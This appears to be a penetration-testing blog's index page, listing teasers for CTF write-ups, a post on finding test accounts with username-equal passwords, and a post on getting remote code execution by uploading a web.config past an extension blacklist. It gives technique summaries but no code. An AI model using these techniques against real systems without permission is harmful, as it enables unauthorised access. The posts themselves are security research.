Pentesting

H1-702 CTF ~ Write-Up

H1-702 CTF Introduction Start Dirbuster Readme Json Web Token Versioning Hidden Enumerate Final steps Introduction() My last two weeks being occupied began with this simple tweet from Jobert Abma. ‏ “Hackers, we’ve built a mobile […] Read More

How I discovered 1500+ test accounts

TL;DR  By using the search function in the mail with an empty search string, I retrieved all the usernames, for which I then checked if the password is the same as the username. By filtering […] Read More

RCE by uploading a web.config

TL;DR By uploading a web.config I was able to bypass the blacklist, which blocks files with an executable extension (such as ‘.asp’ and ‘.aspx’). After setting execution rights to ‘.config’ and then adding asp code […] Read More

H1-212 CTF ~ Write-Up
Scroll Up